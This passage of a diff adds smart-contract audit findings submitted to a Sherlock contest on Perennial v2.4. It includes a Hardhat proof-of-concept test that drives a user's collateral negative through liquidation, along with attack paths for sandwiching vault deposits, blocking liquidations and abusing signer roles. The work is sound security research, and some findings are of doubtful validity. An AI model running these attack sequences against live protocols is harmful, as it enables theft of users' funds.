= BigNumber.from(14400) + await market.updateRiskParameter(riskParameter) + + const COLLATERAL_USER = parse6decimal('30') + const POSITION_USER = parse6decimal('10') + const POSITION2_USER = parse6decimal('100000000') + + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION_USER, 0, COLLATERAL_USER, false) + + const ORACLE_VERSION_3b = { + price: parse6decimal('100'), + timestamp: TIMESTAMP + 7200, + valid: true, + } + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3b.timestamp).returns([ORACLE_VERSION_3b, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_4.timestamp]) + + // position opened. now close position (user is not liquidatable yet) + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false) + + var loc = await market.locals(user.address); + console.log("user collateral before liquidation: " + loc.collateral); + + // version 3 is commited and user becomes liquidatable + oracle.status.returns([ORACLE_VERSION_3b, ORACLE_VERSION_4.timestamp]) + + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION2_USER, 0, 0, true) + + oracle.status.returns([ORACLE_VERSION_4, ORACLE_VERSION_5.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); +}) +``` + +Console output: +```solidity +user collateral before liquidation: 26310000 +user collateral: -36899977657400 +user pos: long = 100000000000000 +``` + +### Mitigation + +Require the liquidation order to only decrease position. \ No newline at end of file diff --git a/033.md b/033.md new file mode 100644 index 0000000..60b2573 --- /dev/null +++ b/033.md @@ -0,0 +1,54 @@ +Clumsy Pink Otter + +Medium + +# Liquidations are temporarily blocked if user's pending position close amount is greater than the latest position size. + +### Summary + +A new feature in v2.4 is guaranteed position change via Intents: since the price is provided in Intent itself, it doesn't need corresponding epoch oracle price to be valid. This makes it possible to close positions even when position opening in still pending (if all orders are from Intents), as such pending negative (pending position closure) is allowed to be greater than latest position size for intent orders: + +```solidity + if ( + context.pendingLocal.invalidation != 0 && // pending orders are partially invalidatable + context.pendingLocal.neg().gt(context.latestPositionLocal.magnitude()) // total pending close is greater than latest position + ) revert IMarket.MarketOverCloseError(); +``` + +The issue is that liquidation order is always a "normal" order (invalidation == 1), thus this condition is always enforced for liquidations. However, if pending negative is already greater than latest position magnitude, it's impossible to create liquidation order which will satisfy this condition (order can only increase pending negative and can't influence latest position). In such situations liquidations will temporarily be impossible until some pending order becomes commited and the condition can be satisfied. + +### Root Cause + +Incorrect validation for protected orders in case `pendingLocal.neg > latestPosition.magnitude()`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L118-L122 + +Notice, that there is a special handling for the case of crossing zero (when pending order closes long and opens short or vice versa): in such case liquidation order must be empty (since crossing zero is prohibited for non-empty non-intent orders). But there is no such handling for the case of large pending position closure. + +### Internal pre-conditions + +- User has more pending close than latest position at the last commited oracle price (for example, user fully closes long position, then opens long again, then closes again). + +### External pre-conditions + +None. + +### Attack Path + +1. User has some position open (for example, `long = 10`) +2. User uses Intent to fully close position +3. Shortly after that (order to close still pending) user uses Intent to open position again (for example, `long = 10`). +4. Then immediately user uses Intent again to partially close position of `size = 1` +5. Shortly after that (all user orders are still pending) the price sharply drops and user becomes liquidatable. +6. At this time, user's latest position = 10, pending positive (open) = 10, pending negative (close) = 11. +7. All liquidations will revert, because regardless of liquidation order size, pending negative will remain greater than latest position (10). +8. Once pending order to close is settled, liquidation is possible again, but might be too late as user might already accumulate bad debt. + +Result: User can not be liquidated in time and is liquidated much later, when his position is already in bad debt, which is a funds loss for all market users or a risk of a bank run as the last to withdraw won't have enough funds in the market to pay out. + +### Impact + +All liquidation attempts revert although the user should be liquidatable, thus liquidation happens later than it should, potentially creating bad debt and loss of funds for all market users. + +### Mitigation + +Similar to crossing zero, include special check when liquidating - and if pending negative is greater than latest position, require liquidation order to be empty. \ No newline at end of file diff --git a/034.md b/034.md new file mode 100644 index 0000000..28dfcb5 --- /dev/null +++ b/034.md @@ -0,0 +1,55 @@ +Careful Aegean Koala + +High + +# Frontrunning attack in Vault contract + +#### 1. Description +The `Vault` contract is vulnerable to front-running attacks due to the following issues: + +1. Slippage Vulnerability in `convertToShares` and `convertToAssets`: + - The functions `convertToShares` and `convertToAssets` calculate conversion rates using real-time ratios (`totalAssets` and `totalShares`) without implementing slippage protection. + - These ratios are derived from the latest checkpoint (`_checkpoints[_accounts[address(0)].read().latest]`) and can be influenced by external factors, such as deposits or redemptions. + - An attacker can monitor pending transactions and manipulate the checkpoint timing to alter the conversion rate temporarily, leading to unfavorable slippage for the victim. + +2. No Commit-Reveal Mechanism: + - Actions like deposits, redemptions, and updates are executed in a single transaction without a commit-reveal scheme. + - This makes sensitive operations vulnerable to sandwich attacks, where an attacker: + 1. Front-runs the user's transaction to manipulate the state (e.g., increase asset prices). + 2. Executes their own transaction to profit from the manipulated state. + 3. Back-runs the user's transaction to restore the original state. + +#### 2. Proof of Concept +1. Slippage Manipulation: + - Alice submits a transaction to deposit assets into the vault. + - Bob, a malicious actor, detects Alice's pending transaction in the mempool. + - Bob front-runs Alice's transaction by submitting a large deposit, which shifts the `totalAssets` and `totalShares` ratio. + - Alice's transaction executes at an unfavorable rate due to the altered ratio. + - Bob back-runs Alice's transaction by withdrawing his deposit, restoring the original state while profiting from the temporary manipulation. + +2. Sandwich Attack: + - Alice submits a transaction to redeem shares from the vault. + - Bob detects Alice's pending transaction and front-runs it by redeeming a large number of shares, causing the `totalAssets` to decrease. + - Alice's transaction executes at a lower asset-per-share ratio, resulting in fewer assets received. + - Bob back-runs Alice's transaction by re-depositing his redeemed assets, restoring the original state while profiting from the price difference. + +[Code](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/vault/contracts/Vault.sol#L137-L153): + +```Soldity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} + +function convertToAssets(UFixed6 shares) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? shares : shares.muldiv(_totalAssets, _totalShares); +} +``` + +#### 3. Impact +- Financial Loss: Users may experience significant slippage or lose funds due to sandwich attacks. +- Market Integrity: Manipulation of conversion rates undermines the fairness and reliability of the vault's operations. +- Likelihood: High (Front-running is a well-documented and prevalent attack vector in DeFi). \ No newline at end of file diff --git a/035.md b/035.md new file mode 100644 index 0000000..5d384d8 --- /dev/null +++ b/035.md @@ -0,0 +1,66 @@ +Clumsy Pink Otter + +Medium + +# Access violation: Intent counterparty submitter is allowed to be signer instead of operator + +### Summary + +When user submits Intent, he specifies the `account` which will be the counterparty of the trade: +```solidity +function update(address account, Intent calldata intent, bytes memory signature) external nonReentrant whenNotPaused { + if (intent.fee.gt(UFixed6Lib.ONE)) revert MarketInvalidIntentFeeError(); + + verifier.verifyIntent(intent, signature); + + _updateIntent( + account, + msg.sender, + intent.amount.mul(Fixed6Lib.NEG_ONE), + intent.price, + address(0), + address(0), + UFixed6Lib.ZERO, + UFixed6Lib.ZERO, + false + ); // account + ... +``` + +The issue is that `msg.sender` must be the `operator` of the `account`, because he doesn't sign anything in this function. However, his address is used as signer in `_updateIntent` (which loads update context, filling in signer from the factory, and then later checking the signer flag in `InvariantLib.validate`), thus it's enough for `msg.sender` to be either `signer` or `operator`. If `msg.sender` is only `signer`, he should have no access to this function, but he can execute it and it's enough to be `signer` while not submitting any signature. + +The same issue happens with the following `market.update`: +```solidity + function update(address account, Fixed6 amount, address referrer) external nonReentrant whenNotPaused { + _updateMarket(account, msg.sender, Fixed6Lib.ZERO, amount, Fixed6Lib.ZERO, referrer); + } +``` +It's enough for `msg.sender` to be signer of account to execute the action, although he doesn't provide any signature, so it must be operator-only. + +### Root Cause + +`msg.sender` is used as signer argument to `_updateIntent`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L154 + +And the same issue here: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L223-L225 + +### Internal pre-conditions + +- User is set as a signer of account, but not as operator + +### External pre-conditions + +None. + +### Attack Path + +- User who only has signer access to account is able to execute `market.update` on behalf of account which is supposed to be only used by the operator. + +### Impact + +Security access violation: user with incorrect role is able to access function which should be accessed only by the other role. + +### Mitigation + +Use `address(0)` in `_updateIntent` for `account` signer, and in `_updateMarket` which is not connected with the signature. \ No newline at end of file diff --git a/036.md b/036.md new file mode 100644 index 0000000..9f57000 --- /dev/null +++ b/036.md @@ -0,0 +1,49 @@ +Shambolic Mint Dinosaur + +High + +# Same-Transaction Deposit/Withdrawal + +### Summary + +The update function allows updating positions and collateral in the same transaction without delays, risking flash loan exploits. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L232 the update function allows changing positions and collateral in the same transaction, enabling attackers to bypass collateral checks via flash loans. +The collateral parameter allows users to deposit (Fixed6 > 0) or withdraw (Fixed6 < 0) collateral in the same transaction as position updates. +The key vulnerable logic lies in the _updateMarket function which directly processes collateral changes without enforcing a cooldown. The code does not enforce a delay between deposits and withdrawals. + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L752 the collateral is updated. + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L771 the withdrawal is made. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +1.Deposit Collateral: + update(account, Fixed6.wrap(0), Fixed6.wrap(0), Fixed6.wrap(1000e18), referrer); +2.Borrow Against Collateral: + update(account, Fixed6.wrap(0), Fixed6.wrap(-500e18), Fixed6.wrap(0), referrer); // Short 500 tokens +3.Withdraw Collateral in Same Transaction: + update(account, Fixed6.wrap(0), Fixed6.wrap(0), Fixed6.wrap(-1000e18), referrer); // Withdraw all + +### Impact + +1.Flash loans can bypass collateral checks. +2.An attacker deposits collateral, borrows assets, and withdraws collateral in the same transaction, leaving the protocol undercollateralized,violating protocol solvency. + +### PoC + +_No response_ + +### Mitigation + +Enforce a 1-block delay for withdrawals after deposits. \ No newline at end of file diff --git a/037.md b/037.md new file mode 100644 index 0000000..569e2ac --- /dev/null +++ b/037.md @@ -0,0 +1,118 @@ +Cheerful Taffy Dolphin + +Medium + +# Duplicate Market Allocation Bypass Leads to Continuous Rebalancing and Fee Drain + +## Summary + +A vulnerability exists in `_updateRebalanceGroup` where duplicate markets can be used to bypass the target allocation validation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller.sol#L277 + +```solidity +UFixed6 totalAllocation; +for (uint256 i; i < message.markets.length; i++) { + marketToGroup[owner][message.markets[i]] = message.group; + _rebalanceConfigs[owner][message.group][message.markets[i]] = message.configs[i]; + groupToMarkets[owner][message.group].push(IMarket(message.markets[i])); + + totalAllocation = totalAllocation.add(message.configs[i].target); +} + +if (message.markets.length != 0 && !totalAllocation.eq(UFixed6Lib.ONE)) + revert ControllerInvalidRebalanceTargetsError(); +``` + +## Impact +When a rebalancing configuration is set with duplicate markets, the storage updates result in a single market having a target allocation less than 100%, while the validation is bypassed by summing the duplicate targets. For example, using [marketA, marketA] with 60% targets each would pass validation (120% total) but store a 60% target for marketA. + +This impacts the rebalancing mechanism in `checkGroup` which is used by `_rebalanceGroup`: + +```solidity +function checkGroup(address owner, uint256 group) public view returns ( + Fixed6 groupCollateral, + bool canRebalance, + Fixed6[] memory imbalances +) { + // Query collateral and calculate imbalances based on stored targets + (actualCollateral, groupCollateral) = _queryMarketCollateral(owner, group); + + for (uint256 i; i < actualCollateral.length; i++) { + IMarket market = groupToMarkets[owner][group][i]; + RebalanceConfig memory marketRebalanceConfig = _rebalanceConfigs[owner][group][address(market)]; + (bool canMarketRebalance, Fixed6 imbalance) = RebalanceLib.checkMarket( + marketRebalanceConfig, // Contains invalid target < 100% + groupToMaxRebalanceFee[owner][group], + groupCollateral, + actualCollateral[i] + ); + imbalances[i] = imbalance; + canRebalance = canRebalance || canMarketRebalance; + } +} +``` + +Because the system is configured with a target that sums to less than 100% (e.g., 60% through duplicate market inputs), it will perpetually try to rebalance to an impossible state through marketTransfer calls in _rebalanceGroup. This creates a feedback loop where repeated rebalancing attempts lead to continuous fee extraction and MEV opportunities, as the system can never achieve the invalid target allocation. The comment // read from storage to trap duplicate markets indicates this risk was known but the implementation fails to prevent it. + +## Fix + +To fix this, the function should either: +1. Add a check for duplicate markets before processing them, or +2. Calculate the total allocation by reading from the storage mappings after they've been updated, which would naturally handle duplicates correctly + +For example: + +```solidity +function _updateRebalanceGroup( + RebalanceConfigChange calldata message, + address owner +) private { + if (message.group == 0 || message.group > MAX_GROUPS_PER_OWNER) + revert ControllerInvalidRebalanceGroupError(); + + if (message.markets.length > MAX_MARKETS_PER_GROUP) + revert ControllerInvalidRebalanceMarketsError(); + + // Delete existing group configuration + for (uint256 i; i < groupToMarkets[owner][message.group].length; i++) { + address market = address(groupToMarkets[owner][message.group][i]); + delete _rebalanceConfigs[owner][message.group][market]; + delete marketToGroup[owner][market]; + } + delete groupToMarkets[owner][message.group]; + + // Check for duplicates and validate total allocation before state changes + UFixed6 totalAllocation; + for (uint256 i; i < message.markets.length; i++) { + // Check for duplicates in the input array + for (uint256 j = 0; j < i; j++) { + if (message.markets[i] == message.markets[j]) + revert ControllerDuplicateMarketError(message.markets[i]); + } + + // Accumulate total allocation + totalAllocation = totalAllocation.add(message.configs[i].target); + } + + // Validate total allocation equals 100% if group is not being deleted + if (message.markets.length != 0 && !totalAllocation.eq(UFixed6Lib.ONE)) + revert ControllerInvalidRebalanceTargetsError(); + + // Update state after all validation passes + for (uint256 i; i < message.markets.length; i++) { + uint256 currentGroup = marketToGroup[owner][message.markets[i]]; + if (currentGroup != 0) + revert ControllerMarketAlreadyInGroupError(IMarket(message.markets[i]), currentGroup); + + marketToGroup[owner][message.markets[i]] = message.group; + _rebalanceConfigs[owner][message.group][message.markets[i]] = message.configs[i]; + groupToMarkets[owner][message.group].push(IMarket(message.markets[i])); + groupToMaxRebalanceFee[owner][message.group] = message.maxFee; + + emit RebalanceMarketConfigured(owner, message.group, message.markets[i], message.configs[i]); + } + + emit RebalanceGroupConfigured(owner, message.group, message.markets.length); +} +``` diff --git a/038.md b/038.md new file mode 100644 index 0000000..09c9899 --- /dev/null +++ b/038.md @@ -0,0 +1,57 @@ +Cheerful Taffy Dolphin + +Medium + +# Restrictive Domain Validation in Verifier Contract Breaks Zero-Domain Message Processing and Market Integrations + +## Summary + +The `Verifier` contract implements critical signature verification functionality for the Perennial protocol but relies on a `VerifierBase` implementation that does not match its documented behavior for domain validation. + +The contract's documentation explicitly states: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L58 + +```solidity +/// Messages verification request must come from the domain address if it is set. +/// - In the case of intent / fills, this means that the market should be set as the domain. +``` + +However, through inheritance of VerifierBase's `validateAndCancel` modifier, all verification functions (`verifyIntent`, `verifyOperatorUpdate`, `verifySignerUpdate`, `verifyAccessUpdateBatch`) enforce a stricter domain validation that requires msg.sender to match the domain in all cases. + +## Impact +The restrictive domain validation in the `Verifier` contract has critical implications for the protocol's operation, particularly in the verification of intents and signature processing: + +1. Intent Processing Disruption: +When markets attempt to verify intents via `verifyIntent()`, the current implementation forces a strict domain match even for legitimate zero-domain cases. This directly impacts order fills since every intent verification must route through a specific market address as msg.sender, preventing any flexible intent verification patterns. + +2. Market Integration Limitations: +Since `verifyIntent()` is a key entry point for order processing, markets must be the msg.sender for any intent verification. Consider a case where multiple markets need to verify the same intent - the current domain validation makes this impossible since the intent can only be verified by the specific market set in the domain field. + +3. Excessive Domain Enforcement: +Operations like `verifyOperatorUpdate()` and `verifySignerUpdate()` which manage protocol permissions are unnecessarily restricted. These administrative functions should reasonably support zero-domain verification, especially for direct account management. However, the current validation forces even these basic account operations to route through a domain address. + +These restrictions conflict with the protocol's own documentation which specifies domain validation should only occur "if it is set," suggesting the current behavior is unintentional and could be blocking legitimate protocol interactions. + +## Recommended mitigation steps +Update the `Verifier` contract to override or implement its own domain validation: + +```solidity +contract Verifier is VerifierBase, IVerifier, Initializable { + modifier validateDomain(Common calldata common) { + if (common.domain != address(0) && common.domain != msg.sender) + revert VerifierInvalidDomainError(); + _; + } + + function verifyIntent(Intent calldata intent, bytes calldata signature) + external + validateDomain(intent.common) // Add flexible domain validation + validateAndCancel(intent.common, signature) + { + // ... existing implementation + } + + // Apply to other verification functions +} +``` diff --git a/039.md b/039.md new file mode 100644 index 0000000..5abad28 --- /dev/null +++ b/039.md @@ -0,0 +1,103 @@ +Cheerful Taffy Dolphin + +Medium + +# First Depositor Share Price Manipulation via Zero Minimum Deposit Enables Unfair Value Extraction From Subsequent Depositors + +## Summary +A vulnerability exists in the Vault contract where an attacker can manipulate the initial share price ratio by exploiting the lack of minimum deposit enforcement during initialization. While the contract has a `minDeposit` parameter in its `VaultParameter` struct, the initialization explicitly sets this to zero, creating a window where an attacker can establish an unfavorable share ratio through a minimal initial deposit before any deposit limits are enforced. + +The issue lies in the initialization sequence and how it affects early depositors. + +1. During initialization, the Vault sets parameters with zero minimum deposit: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L70 + +```solidity +function initialize( + Token18 asset_, + IMarket initialMarket, + UFixed6 initialDeposit, + string calldata name_ +) external initializer(1) { + // ... + _updateParameter(VaultParameter(initialDeposit, UFixed6Lib.ZERO)); +} +``` + +2. The share calculation for deposits is handled in `convertToShares()`: +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +3. When users deposit, the `_update()` function enforces minimum deposit checks: +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // ... + if (!depositAssets.isZero() && depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + // ... +} +``` + +## vulnerability sequence: +1. Contract is initialized with `minDeposit = 0` +2. First depositor can deposit a tiny amount (e.g., 1 wei) since there's no minimum enforcement +3. Their shares are minted 1:1 with assets since `_totalShares.isZero()` +4. They can manipulate underlying asset value through market actions +5. Subsequent depositors get fewer shares due to the manipulated asset/share ratio + + +## Impact + +The impact manifests in the share/asset ratio manipulation through the `convertToShares()` calculation: + +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +When legitimate users deposit after the attack: +1. Share Dilution: If attacker deposits 1 wei and manipulates _totalAssets to 100 ETH, a user depositing 50 ETH would receive shares calculated as: `50 ETH * (1 wei) / 100 ETH`, resulting in dramatically fewer shares than their deposit proportion warrants. + +2. Value Extraction: The attacker can then extract value by redeeming their disproportionate shares. Their 1 wei initial deposit now controls a significant portion of the vault's shares, allowing them to claim an unfair percentage of all subsequent deposits when redeeming. The profit is realized as: `(initial_share_price - manipulated_share_price) * attacker_shares`. + +This creates a systemic asymmetry where every new deposit inherently advantages the attacker's position due to the manipulated share/asset ratio established during initialization. + +## Recommendation: +Add mandatory minimum deposit enforcement in initialization: +```solidity +function initialize( + Token18 asset_, + IMarket initialMarket, + UFixed6 initialDeposit, + UFixed6 minDeposit, // New required parameter + string calldata name_ +) external initializer(1) { + require(!minDeposit.isZero(), "Vault: minimum deposit must be non-zero"); + __Instance__initialize(); + asset = asset_; + _name = name_; + _register(initialMarket); + _updateParameter(VaultParameter(initialDeposit, minDeposit)); +} +``` + +This ensures there's always a meaningful minimum deposit requirement from the very first deposit, preventing share price manipulation through tiny initial deposits. + +While the owner could theoretically call `updateParameter()` right after initialization to set a minimum, relying on external actions for security invariants is unsafe. The contract must enforce these constraints at the protocol level. + +The fix makes the security guarantee explicit in code rather than depending on proper owner operation. diff --git a/040.md b/040.md new file mode 100644 index 0000000..979ee5d --- /dev/null +++ b/040.md @@ -0,0 +1,61 @@ +Cheerful Taffy Dolphin + +Medium + +# Lack of Slippage Protection in Share Minting Allows MEV Sandwich Attacks and Market Manipulation Which can Extract Value From Depositors + +## Summary + +There is no slippage protection in the Vault's deposit mechanism, which means users have no way to specify minimum shares they expect to receive when depositing assets. This omission exposes users to potential value loss through share price manipulation and market movements during the transaction confirmation period. While the contract handles the deposit-to-shares conversion through `convertToShares()`, it lacks any guardrails to protect users from executing deposits at unexpectedly unfavorable rates. + + +The vulnerability manifests in the share price calculation mechanics within the vault's deposit flow. When users deposit assets, the conversion to shares occurs through `convertToShares()`: + +```solidity +function convertToShares(UFixed6 assets) external view returns (UFixed6) { + (UFixed6 _totalAssets, UFixed6 _totalShares) = + (UFixed6Lib.unsafeFrom(totalAssets()), totalShares()); + return _totalShares.isZero() ? assets : assets.muldiv(_totalShares, _totalAssets); +} +``` + +The core issue is that the `_update()` function accepts the deposit and mints shares without any minimum share output validation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313 +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // No slippage check before executing the deposit + context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); +} +``` + +The share price can be manipulated between transaction submission and execution through multiple vectors: +- The vault's market positions can be adjusted via `_manage()`, affecting `totalAssets()` +- Underlying oracle price updates shift position valuations +- Front-running deposits/withdrawals can alter the share/asset ratio through `context.global.update()` + +This allows MEV bots to sandwich deposit transactions by: +1. Front-running with actions that devalue shares +2. Allowing victim's deposit to execute at unfavorable share ratio +3. Back-running to restore share price and extract value + +## Impact +The vulnerability creates a systemic risk for depositors since their transactions can be exploited by MEV bots or suffer from adverse price movements with no recourse to revert based on share output. The lack of slippage protection means every deposit transaction is potentially vulnerable to sandwich attacks and market manipulation, leading to direct value extraction from depositors. + +## Fix +The fix requires adding slippage validation during the deposit flow: +```solidity +// Add minSharesOut parameter to update function +if (convertToShares(depositAssets).lt(minSharesOut)) revert InsufficientSharesOut(); +``` + +This enforces user-specified minimum share requirements before proceeding with deposit execution. + + diff --git a/041.md b/041.md new file mode 100644 index 0000000..94d20c3 --- /dev/null +++ b/041.md @@ -0,0 +1,82 @@ +Cheerful Taffy Dolphin + +Medium + +# Suboptimal Position Size Rounding in MakerVault Reduces Protocol Fee Generation + +## Summary +In MakerVault's implementation of `_strategy()`, maker position sizes are being calculated with overly conservative rounding that reduces vault revenue without providing additional safety benefits: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/MakerVault.sol#L20 + +```solidity +// in MakerVault.sol +function _strategy( + Context memory context, + UFixed6 deposit, + UFixed6 withdrawal, + UFixed6 ineligible +) internal override view returns (Target[] memory targets) { + return MakerStrategyLib.allocate(context.registrations, deposit, withdrawal, ineligible); +} +``` + +The issue manifests in MakerStrategyLib's position size calculations, where rounding down is used despite safety checks already being enforced elsewhere. This reduces the vault's fee-generating capacity without providing additional risk protection. + +The vault's fundamental safety checks happen early in the allocation process. The `allocate()` function first validates that there's sufficient collateral and assets: + +```solidity +// In allocate(): +if (collateral.lt(context.totalMargin)) revert MakerStrategyInsufficientCollateralError(); +if (assets.lt(context.minAssets)) revert MakerStrategyInsufficientAssetsError(); +``` + +After these core validations pass, the vault calculates market-specific allocations in `_allocateMarket()`. Here, the available assets for each market are strictly bounded by both the weight-based allocation and a leveraged collateral limit: + +```solidity +marketAssets = assets + .mul(marketContext.registration.weight) + .min(marketCollateral.mul(LEVERAGE_BUFFER)); +``` + +The `LEVERAGE_BUFFER` of 1.2x provides an additional safety margin on the collateral allocation. Only after these conservative limits are applied does the vault calculate the final maker position size: + +```solidity +newMaker = marketAssets + .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs()) + .max(marketContext.minPosition) + .min(marketContext.maxPosition); +``` + +This calculation currently rounds down, but by this point in the execution flow, we're already operating within comprehensively checked safety bounds. The rounding down creates maker positions slightly smaller than what the vault's capital could safely support. Since maker positions generate fees for the vault, this conservative rounding actually reduces revenue potential without providing additional safety, as all key risk constraints were enforced upstream through explicit checks and bounds. + +The impact compounds because the vault typically operates across multiple markets and rebalances regularly. Each time this calculation runs, the rounding down slightly reduces position sizes below what's safely achievable within the already-enforced risk parameters. Rounding up the maker position calculation would allow the vault to capture this lost fee generation opportunity while still respecting all safety constraints, since the core protections are already handled by the upstream checks and bounds. + +## Recommended Fix + +The fix is to use this instead: + +```solidity +// In MakerStrategyLib._allocateMarket() +function _allocateMarket( + MarketMakerStrategyContext memory marketContext, + UFixed6 totalMargin, + UFixed6 collateral, + UFixed6 assets +) private pure returns (Target memory target, UFixed6 marketCollateral) { + // ... existing code ... + + // Use muldivOut instead of muldiv for maker position calculation to maximize fee generation + // while staying within pre-validated safety bounds + UFixed6 newMaker = marketAssets + .muldivOut(marketContext.registration.leverage, marketContext.latestPrice.abs()) // Changed to muldivOut + .max(marketContext.minPosition) + .min(marketContext.maxPosition); + + target.maker = Fixed6Lib.from(newMaker).sub(Fixed6Lib.from(marketContext.currentAccountPosition.maker)); + + // ... rest of the function ... +} +``` + +This modification ensures the vault maximizes its fee-generating capacity while maintaining all existing safety guarantees provided by the upstream checks and bounds. \ No newline at end of file diff --git a/042.md b/042.md new file mode 100644 index 0000000..c3ce43b --- /dev/null +++ b/042.md @@ -0,0 +1,79 @@ +Cheerful Taffy Dolphin + +Medium + +# Vault Collateral Over-Reservation Bug Leads to 100% Capital Lockup Due to Zero-State Division Edge Case + +## Summary +In the vault's allocation logic, there's a critical bug in how ineligible collateral is calculated during early vault states or after full redemptions. The issue stems from the `_ineligible()` function that determines how much collateral should be reserved vs made available for new allocations: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L459 + +```solidity +function _ineligible(Context memory context, UFixed6 deposit, UFixed6 withdrawal) private pure returns (UFixed6) { + UFixed6 redemptionEligible = UFixed6Lib.unsafeFrom(context.totalCollateral) + .unsafeSub(context.global.assets.add(withdrawal)) + .unsafeSub(context.global.deposit.sub(deposit)); + + return redemptionEligible.mul( + context.global.redemption.unsafeDiv( + context.global.shares.add(context.global.redemption) + ) + ).add(context.global.assets); +} +``` + +The bug emerges in the edge case when there are no shares and no redemptions in the vault - a state that occurs at vault initialization or if all shares have been redeemed. + +```solidity +// In UFixed6Lib: +function unsafeDiv(UFixed6 a, UFixed6 b) internal pure returns (UFixed6) { + if (isZero(b)) { + return isZero(a) ? ONE : MAX; + } else { + return div(a, b); + } +} +``` + +This is used in the ineligible calculation: + +```solidity +redemptionEligible.mul( + context.global.redemption.unsafeDiv( + context.global.shares.add(context.global.redemption) + ) +) +``` + +Consider what happens when the vault has no shares and no redemptions: +- `context.global.shares` is 0 +- `context.global.redemption` is 0 +- So `context.global.shares.add(context.global.redemption)` is 0 +- And `context.global.redemption` is also 0 + +In this case, we hit the `0/0` condition in `unsafeDiv`, which returns `ONE` (1e6 in Fixed6 representation). This means: +- `redemptionEligible.mul(ONE)` equals `redemptionEligible` +- So we're incorrectly marking the full `redemptionEligible` amount as ineligible for allocation +- When in reality, with no shares and no redemptions, none of the collateral should be reserved for redemptions + +The current fallback to `ONE` effectively reserves 100% of redeemable collateral even when there are no redemptions pending, which is overly conservative and could unnecessarily restrict capital efficiency. + +## Fix +A more capital efficient approach would be to explicitly handle this edge case: + +```solidity +function _ineligible(Context memory context, UFixed6 deposit, UFixed6 withdrawal) private pure returns (UFixed6) { + UFixed6 redemptionEligible = UFixed6Lib.unsafeFrom(context.totalCollateral) + .unsafeSub(context.global.assets.add(withdrawal)) + .unsafeSub(context.global.deposit.sub(deposit)); + + // If there are no redemptions, don't reserve any collateral regardless of shares + if (context.global.redemption.isZero()) return context.global.assets; + + return redemptionEligible + .mul(context.global.redemption) + .unsafeDiv(context.global.shares.add(context.global.redemption)) + .add(context.global.assets); +} +``` \ 